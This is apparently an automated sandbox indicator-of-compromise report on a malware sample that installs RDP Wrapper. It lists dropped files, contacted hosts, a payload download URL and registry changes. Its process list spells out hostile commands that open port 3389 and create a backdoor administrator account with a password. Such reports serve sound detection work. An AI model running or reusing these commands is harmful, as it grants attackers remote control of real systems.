IOC Report
file.exe

loading gif

Files

File Path
Type
Category
Malicious
file.exe
PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
initial sample
malicious
C:\Program Files\RDP Wrapper\rdpwrap.dll
PE32+ executable (DLL) (GUI) x86-64, for MS Windows
dropped
malicious
C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\file.exe.log
CSV text
dropped
malicious
C:\Users\user\AppData\Local\Temp\RDPWInst.exe
PE32 executable (console) Intel 80386, for MS Windows
modified
malicious
C:\Program Files\RDP Wrapper\rdpwrap.ini
Generic INItialization configuration [SLPolicy]
dropped
C:\Windows\System32\rfxvmt.dll
PE32+ executable (DLL) (console) x86-64, for MS Windows
dropped
\Device\ConDrv
ASCII text, with CRLF line terminators
dropped
\Device\Mup\585948*\MAILSLOT\NET\NETLOGON
data
dropped

Processes

Path
Cmdline
Malicious
C:\Users\user\Desktop\file.exe
"C:\Users\user\Desktop\file.exe"
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "AllowRemoteRPC" /t REG_DWORD /d 1 /f
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
malicious
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "DisableRemoteDesktop" /t REG_DWORD /d 0 /f
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c "C:\Users\user\AppData\Local\Temp\RDPWInst.exe" -i
malicious
C:\Users\user\AppData\Local\Temp\RDPWInst.exe
C:\Users\user\AppData\Local\Temp\RDPWInst.exe -i
malicious
C:\Windows\System32\netsh.exe
netsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net user BoydKrajcik hDNQhfjKM9S0 /add
malicious
C:\Windows\SysWOW64\net.exe
net user BoydKrajcik hDNQhfjKM9S0 /add
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net localgroup
malicious
C:\Windows\SysWOW64\net.exe
net localgroup
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net localgroup "Remote Desktop Users" BoydKrajcik /add
malicious
C:\Windows\SysWOW64\net.exe
net localgroup "Remote Desktop Users" BoydKrajcik /add
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
malicious
C:\Windows\SysWOW64\netsh.exe
netsh advfirewall firewall add rule name="RDP" dir=in action=allow protocol=tcp localport=3389
malicious
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c net localgroup "Administrators" BoydKrajcik /add
malicious
C:\Windows\SysWOW64\net.exe
net localgroup "Administrators" BoydKrajcik /add
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\drivers\rdpvideominiport.sys
C:\Windows\System32\drivers\rdpdr.sys
C:\Windows\System32\drivers\tsusbhub.sys
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 user BoydKrajcik hDNQhfjKM9S0 /add
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Remote Desktop Users" BoydKrajcik /add
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 localgroup "Administrators" BoydKrajcik /add
There are 23 hidden processes, click here to show them.

URLs

Name
IP
Malicious
https://github.com/bchavez/Bogus.
unknown
http://www.apache.org/licenses/LICENSE-2.0
unknown
http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
147.45.44.104
http://api.ipify.orgd
unknown
https://github.com/bchavez/Bogus/issues/54
unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.iniU
unknown
http://schemas.xmlsoap.org/soap/encoding/
unknown
http://www.apache.org/licenses/
unknown
https://cloudflare-ipfs.com/ipfs/Qmd3W5DuhgHirLHGVixi6V76LhCkZUz6pnFt5AJBiyvHye/avatar/
unknown
https://github.com/lontivero/Open.Nat/issuesOAlso
unknown
https://loremflickr.com
unknown
http://schemas.xmlsoap.org/soap/envelope/
unknown
https://raw.githubusercontent.com/stascorp/rdpwrap/master/res/rdpwrap.ini
unknown
http://hansgborn.eud
unknown
https://picsum.photos
unknown
https://placeimg.com
unknown
https://hansgborn.eu
unknown
https://github.com/bchavez/Bogus/issues/115
unknown
http://api.ipify.org
unknown
http://stascorp.com/load/1-1-0-62
unknown
http://stascorp.comDVarFileInfo$
unknown
https://github.com/bchavez/Bogus/wiki/Bogus-Premium
unknown
http://hansgborn.eu
unknown
https://github.com/bchavez/Bogus
unknown
https://via.placeholder.com/
unknown
https://hansgborn.eu/core/receive.phpd
unknown
https://hansgborn.eu/core/receive.php
188.114.97.3
http://api.ipify.org/
104.26.12.205
http://147.45.44.104
unknown
https://github.com/bchavez/Bogus:
unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
unknown
There are 21 hidden URLs, click here to show them.

Domains

Name
IP
Malicious
hansgborn.eu
188.114.97.3
api.ipify.org
104.26.12.205

IPs

IP
Domain
Country
Malicious
8.46.123.33
unknown
United States
malicious
104.26.12.205
api.ipify.org
United States
239.255.255.250
unknown
Reserved
188.114.97.3
hansgborn.eu
European Union
147.45.44.104
unknown
Russian Federation

Registry

Path
Value
Malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server\Licensing Core
EnableConcurrentSessions
malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\TermService\Parameters
ServiceDll
malicious
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server
fDenyTSConnections
malicious
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
EnableAutoFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Tracing\file_RASMANCS
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
AllowRemoteRPC
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System
DisableRemoteDesktop
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
AllowMultipleTSSessions
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
NoDisplayClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}
NoUseClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{81c87465-de07-4efc-9d93-61e891d52fd2}\Properties
Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
NoDisplayClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}
NoUseClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}\Properties
Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
Class
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
NoDisplayClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}
NoUseClass
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{091bc97e-2352-4362-a539-10a6d8ff7596}\Properties
Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{cc41eba2-ab57-4f4e-8c3d-1bc33b1e74e3}\Properties
Security
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
WdfMajorVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\tsusbhub\Parameters\Wdf
WdfMinorVersion
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\DeviceClasses\{191a5137-7c9d-43c0-a943-de4411f424f7}\##?#TS_USB_HUB_Enumerator#UMB#2&30d3618&0&TS_USB_HUB#{191a5137-7c9d-43c0-a943-de4411f424f7}
DeviceInstance
There are 27 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
450000
unkown
page readonly
malicious
450000
unkown
page readonly
malicious
32D1000
trusted library allocation
page read and write
malicious
C62000
unkown
page execute read
malicious
D4A000
unkown
page readonly
malicious
67D000
stack
page read and write
69EC000
heap
page read and write
35A4000
trusted library allocation
page read and write
B0E000
direct allocation
page read and write
2E82000
heap
page read and write
154D000
trusted library allocation
page execute and read and write
670E000
stack
page read and write
2370000
heap
page read and write
3B4E000
trusted library allocation
page read and write
2830000
heap
page read and write
296E000
unkown
page read and write
628E000
stack
page read and write
2A9F000
stack
page read and write
29EF000
stack
page read and write
258D000
stack
page read and write
2FEF000
stack
page read and write
717C000
stack
page read and write
15A0000
trusted library allocation
page read and write
2F60000
heap
page read and write
6E0000
heap
page read and write
3240000
heap
page read and write
2970000
heap
page read and write
3618000
trusted library allocation
page read and write
B00000
direct allocation
page read and write
6DE000
stack
page read and write
2FAE000
stack
page read and write
2A1C000
heap
page read and write
69DC000
heap
page read and write
2C10000
heap
page read and write
258D000
stack
page read and write
2E85000
heap
page read and write
BC0000
heap
page read and write
410000
heap
page read and write
1560000
trusted library allocation
page read and write
2EBD000
stack
page read and write
250D000
stack
page read and write
FF6B0000
trusted library allocation
page execute and read and write
FDC000
stack
page read and write
2DA0000
heap
page read and write
3652000
trusted library allocation
page read and write
343F000
stack
page read and write
2F3D000
stack
page read and write
6DBE000
stack
page read and write
29B0000
heap
page read and write
30AE000
unkown
page read and write
4FD000
stack
page read and write
6CE000
stack
page read and write
7FDE0000
direct allocation
page read and write
B15000
direct allocation
page read and write
1450000
heap
page read and write
28BE000
stack
page read and write
31A0000
heap
page read and write
2B88000
heap
page read and write
780000
heap
page read and write
2CFD000
stack
page read and write
1F0000
heap
page read and write
3220000
trusted library allocation
page read and write
2B00000
heap
page read and write
290E000
stack
page read and write
36D6000
trusted library allocation
page read and write
5770000
trusted library section
page read and write
2DD3000
heap
page read and write
780000
heap
page read and write
31D0000
heap
page read and write
2C55000
heap
page read and write
688E000
stack
page read and write
44B000
unkown
page read and write
59C000
heap
page read and write
351F000
trusted library allocation
page read and write
6A2A000
heap
page read and write
2EFD000
stack
page read and write
2DE8000
heap
page read and write
3200000
heap
page read and write
630F000
stack
page read and write
36DF000
stack
page read and write
6A90000
heap
page read and write
530000
heap
page read and write
68D000
stack
page read and write
1877000
heap
page read and write
184C000
stack
page read and write
700000
heap
page read and write
6F0000
heap
page read and write
29BE000
stack
page read and write
3080000
heap
page read and write
1550000
trusted library allocation
page read and write
2E6B000
heap
page read and write
359A000
trusted library allocation
page read and write
850000
heap
page read and write
19B000
stack
page read and write
6D0000
heap
page read and write
B6D000
stack
page read and write
6A30000
heap
page read and write
2E60000
heap
page read and write
2DAE000
stack
page read and write
93E000
stack
page read and write
3622000
trusted library allocation
page read and write
33C0000
heap
page read and write
2F90000
heap
page read and write
2DBF000
stack
page read and write
760000
heap
page read and write
2DB0000
heap
page read and write
8F0000
heap
page read and write
3380000
heap
page read and write
2958000
heap
page read and write
2ED000
stack
page read and write
292E000
stack
page read and write
2AC0000
heap
page read and write
29CE000
unkown
page read and write
1562000
trusted library allocation
page read and write
3260000
heap
page read and write
AED000
stack
page read and write
2C1E000
stack
page read and write
2B80000
heap
page read and write
330E000
stack
page read and write
361E000
trusted library allocation
page read and write
6AE000
stack
page read and write
B4F000
direct allocation
page read and write
3591000
trusted library allocation
page read and write
2390000
heap
page read and write
35DE000
trusted library allocation
page read and write
8E0000
heap
page read and write
322D000
heap
page read and write
1556000
trusted library allocation
page execute and read and write
6C7E000
stack
page read and write
B1C000
direct allocation
page read and write
2C0F000
unkown
page read and write
3375000
heap
page read and write
2DE0000
heap
page read and write
43ED000
trusted library allocation
page read and write
305F000
unkown
page read and write
678E000
stack
page read and write
78E000
stack
page read and write
18D000
stack
page read and write
84F000
stack
page read and write
25F0000
heap
page read and write
2E84000
heap
page read and write
1455000
heap
page read and write
69D0000
heap
page read and write
1540000
trusted library allocation
page read and write
307F000
stack
page read and write
673000
heap
page read and write
2DE5000
heap
page read and write
5C4F000
stack
page read and write
3370000
heap
page read and write
B48000
direct allocation
page read and write
2E86000
heap
page read and write
2720000
heap
page read and write
600F000
stack
page read and write
53E000
stack
page read and write
2850000
heap
page read and write
7A30000
heap
page execute and read and write
5B3000
heap
page read and write
445000
unkown
page write copy
1639000
heap
page read and write
2DE0000
heap
page read and write
604E000
stack
page read and write
2471000
direct allocation
page read and write
4FD000
stack
page read and write
64DE000
stack
page read and write
2B4F000
stack
page read and write
298E000
stack
page read and write
57E000
unkown
page read and write
2480000
direct allocation
page read and write
2D3E000
stack
page read and write
29FE000
stack
page read and write
44C000
unkown
page write copy
5B2000
heap
page read and write
367A000
trusted library allocation
page read and write
364A000
trusted library allocation
page read and write
B2B000
direct allocation
page read and write
5C0000
heap
page read and write
32C0000
heap
page read and write
33B0000
heap
page read and write
2AEE000
stack
page read and write
69E7000
heap
page read and write
8FF000
stack
page read and write
14DE000
stack
page read and write
72BD000
stack
page read and write
69E3000
heap
page read and write
410000
heap
page read and write
6B30000
heap
page read and write
62E000
stack
page read and write
33C7000
heap
page read and write
671000
heap
page read and write
5B5000
heap
page read and write
2750000
heap
page read and write
9AF000
stack
page read and write
2380000
heap
page read and write
12F7000
stack
page read and write
72E0000
trusted library allocation
page execute and read and write
3656000
trusted library allocation
page read and write
5DCE000
stack
page read and write
72C0000
trusted library allocation
page read and write
360C000
trusted library allocation
page read and write
1D0000
heap
page read and write
17BE000
stack
page read and write
2950000
heap
page read and write
3320000
heap
page read and write
3675000
trusted library allocation
page read and write
15C0000
heap
page read and write
359F000
unkown
page read and write
614E000
stack
page read and write
2CFD000
stack
page read and write
590000
heap
page read and write
355F000
trusted library allocation
page read and write
61E000
unkown
page read and write
401000
unkown
page execute read
2A10000
heap
page read and write
2EC0000
heap
page read and write
2710000
heap
page read and write
3373000
trusted library allocation
page read and write
A77000
direct allocation
page read and write
15DF000
heap
page read and write
6A01000
heap
page read and write
33AC000
heap
page read and write
309F000
unkown
page read and write
446000
unkown
page write copy
293E000
stack
page read and write
2DE0000
heap
page read and write
2ABE000
stack
page read and write
71BE000
stack
page read and write
33C5000
heap
page read and write
3561000
trusted library allocation
page read and write
36D2000
trusted library allocation
page read and write
36AD000
trusted library allocation
page read and write
725000
heap
page read and write
36B1000
trusted library allocation
page read and write
320C000
heap
page read and write
291D000
stack
page read and write
35D3000
trusted library allocation
page read and write
6FE000
stack
page read and write
77F000
stack
page read and write
3200000
heap
page read and write
3B4C000
trusted library allocation
page read and write
62CE000
stack
page read and write
366E000
trusted library allocation
page read and write
15F5000
heap
page read and write
2980000
heap
page read and write
42D1000
trusted library allocation
page read and write
17FE000
stack
page read and write
315F000
stack
page read and write
420000
heap
page read and write
35D9000
trusted library allocation
page read and write
1800000
heap
page execute and read and write
1530000
heap
page read and write
305F000
unkown
page read and write
2C20000
heap
page read and write
5760000
trusted library allocation
page execute and read and write
3784000
trusted library allocation
page read and write
6B20000
heap
page read and write
400000
unkown
page readonly
1691000
heap
page read and write
2C50000
heap
page read and write
2C70000
heap
page read and write
2A34000
heap
page read and write
B39000
direct allocation
page read and write
2E81000
heap
page read and write
2E60000
heap
page read and write
361C000
trusted library allocation
page read and write
675000
heap
page read and write
401000
unkown
page execute read
400000
unkown
page readonly
6DFD000
stack
page read and write
2DB0000
heap
page read and write
241C000
direct allocation
page read and write
29FE000
unkown
page read and write
618E000
stack
page read and write
35D1000
trusted library allocation
page read and write
337E000
unkown
page read and write
447000
unkown
page read and write
36D4000
trusted library allocation
page read and write
2CFD000
stack
page read and write
2CFF000
stack
page read and write
149E000
stack
page read and write
29FE000
stack
page read and write
5C8E000
stack
page read and write
580000
heap
page read and write
6C39000
stack
page read and write
355D000
trusted library allocation
page read and write
311E000
stack
page read and write
291D000
stack
page read and write
420000
heap
page read and write
32A0000
trusted library allocation
page read and write
2DFE000
stack
page read and write
2A7E000
stack
page read and write
2FF0000
heap
page read and write
6B0000
heap
page read and write
3585000
trusted library allocation
page read and write
1524000
trusted library allocation
page read and write
15CE000
heap
page read and write
2E83000
heap
page read and write
A6F000
stack
page read and write
2ABD000
stack
page read and write
500000
heap
page read and write
36A0000
trusted library allocation
page read and write
1870000
heap
page read and write
548000
heap
page read and write
3160000
heap
page read and write
6A8E000
heap
page read and write
690000
heap
page read and write
355B000
trusted library allocation
page read and write
2E6C000
heap
page read and write
3521000
trusted library allocation
page read and write
2411000
direct allocation
page read and write
8E5000
heap
page read and write
263D000
stack
page read and write
651E000
stack
page read and write
6BA000
heap
page read and write
1552000
trusted library allocation
page read and write
B81000
direct allocation
page read and write
634E000
stack
page read and write
2E3D000
stack
page read and write
A54000
direct allocation
page read and write
1523000
trusted library allocation
page execute and read and write
358D000
trusted library allocation
page read and write
3672000
trusted library allocation
page read and write
2A10000
heap
page read and write
427000
heap
page read and write
A50000
direct allocation
page read and write
35C6000
trusted library allocation
page read and write
336F000
stack
page read and write
1537000
heap
page read and write
2DD5000
heap
page read and write
23B0000
heap
page read and write
6B0000
heap
page read and write
2395000
heap
page read and write
28EF000
unkown
page read and write
29BE000
unkown
page read and write
700000
heap
page read and write
152D000
trusted library allocation
page execute and read and write
3654000
trusted library allocation
page read and write
23FE000
stack
page read and write
2990000
heap
page read and write
7A1E000
stack
page read and write
365A000
trusted library allocation
page read and write
16B9000
heap
page read and write
358B000
trusted library allocation
page read and write
35DE000
stack
page read and write
3662000
trusted library allocation
page read and write
AF8000
direct allocation
page read and write
19D000
stack
page read and write
25CD000
stack
page read and write
3616000
trusted library allocation
page read and write
3658000
trusted library allocation
page read and write
363A000
trusted library allocation
page read and write
155A000
trusted library allocation
page execute and read and write
33C1000
heap
page read and write
7CE000
stack
page read and write
78D000
stack
page read and write
B32000
direct allocation
page read and write
B88000
direct allocation
page read and write
365C000
trusted library allocation
page read and write
1420000
heap
page read and write
1AD000
stack
page read and write
2980000
heap
page read and write
C60000
unkown
page readonly
1CD000
stack
page read and write
707E000
stack
page read and write
3589000
trusted library allocation
page read and write
7FE000
stack
page read and write
33A0000
heap
page read and write
3627000
trusted library allocation
page read and write
365E000
trusted library allocation
page read and write
69D6000
heap
page read and write
1340000
heap
page read and write
7A20000
trusted library allocation
page read and write
2D3E000
stack
page read and write
3650000
trusted library allocation
page read and write
7FC20000
direct allocation
page read and write
3AD000
stack
page read and write
660D000
stack
page read and write
6BE000
heap
page read and write
2E0E000
stack
page read and write
2DBC000
heap
page read and write
35D6000
trusted library allocation
page read and write
29D0000
heap
page read and write
30B0000
heap
page read and write
35C9000
trusted library allocation
page read and write
6CBE000
stack
page read and write
B07000
direct allocation
page read and write
703C000
stack
page read and write
A3F000
stack
page read and write
7FD70000
direct allocation
page read and write
15C8000
heap
page read and write
7A40000
trusted library section
page read and write
2748000
heap
page read and write
77F000
stack
page read and write
5B4D000
stack
page read and write
540000
heap
page read and write
333E000
stack
page read and write
315F000
stack
page read and write
6A0D000
heap
page read and write
720000
heap
page read and write
3624000
trusted library allocation
page read and write
12D000
stack
page read and write
3587000
trusted library allocation
page read and write
30D0000
heap
page read and write
2970000
heap
page read and write
35E0000
heap
page read and write
2990000
heap
page read and write
649E000
unkown
page read and write
33B8000
heap
page read and write
1510000
trusted library allocation
page read and write
44D000
unkown
page write copy
6EFB000
stack
page read and write
14E0000
heap
page read and write
620000
heap
page read and write
31DF000
unkown
page read and write
26BD000
stack
page read and write
2730000
heap
page read and write
29BF000
unkown
page read and write
6A34000
heap
page read and write
9C000
stack
page read and write
5ECE000
stack
page read and write
650000
heap
page read and write
290D000
stack
page read and write
9EE000
stack
page read and write
3660000
trusted library allocation
page read and write
1567000
trusted library allocation
page execute and read and write
3750000
heap
page read and write
6A0000
heap
page read and write
6A47000
heap
page read and write
243B000
direct allocation
page read and write
319F000
stack
page read and write
6FE000
stack
page read and write
35EC000
trusted library allocation
page read and write
26D000
stack
page read and write
270E000
stack
page read and write
2AC5000
heap
page read and write
2E20000
heap
page read and write
69F9000
heap
page read and write
53CD000
stack
page read and write
2880000
heap
page read and write
286E000
stack
page read and write
2888000
heap
page read and write
65B000
heap
page read and write
11D000
stack
page read and write
5F0E000
stack
page read and write
644E000
stack
page read and write
1520000
trusted library allocation
page read and write
2AA0000
heap
page read and write
2A32000
heap
page read and write
2D2E000
stack
page read and write
1850000
trusted library allocation
page read and write
65CC000
stack
page read and write
7FD00000
direct allocation
page read and write
15B0000
trusted library allocation
page read and write
287E000
stack
page read and write
1580000
trusted library allocation
page read and write
2B2F000
stack
page read and write
BD0000
heap
page read and write
156B000
trusted library allocation
page execute and read and write
4442000
trusted library allocation
page read and write
35CB000
trusted library allocation
page read and write
575E000
stack
page read and write
358F000
trusted library allocation
page read and write
6BE000
stack
page read and write
2ECD000
stack
page read and write
6F3E000
stack
page read and write
3620000
trusted library allocation
page read and write
2FCD000
stack
page read and write
768000
heap
page read and write
29C0000
heap
page read and write
2C30000
heap
page read and write
23A0000
heap
page read and write
35E8000
trusted library allocation
page read and write
1602000
heap
page read and write
29A0000
heap
page read and write
445000
unkown
page read and write
5D8E000
stack
page read and write
2A3D000
stack
page read and write
28EF000
stack
page read and write
321E000
stack
page read and write
2D0F000
stack
page read and write
29B0000
heap
page read and write
35DB000
trusted library allocation
page read and write
3230000
heap
page read and write
2E60000
heap
page read and write
7781000
trusted library allocation
page read and write
7B0000
heap
page read and write
1590000
trusted library allocation
page execute and read and write
2DD0000
heap
page read and write
8F5000
heap
page read and write
3688000
trusted library allocation
page read and write
16BE000
heap
page read and write
2740000
heap
page read and write
35CE000
trusted library allocation
page read and write
3682000
trusted library allocation
page read and write
2DD1000
heap
page read and write
357F000
trusted library allocation
page read and write
2980000
heap
page read and write
There are 486 hidden memdumps, click here to show them.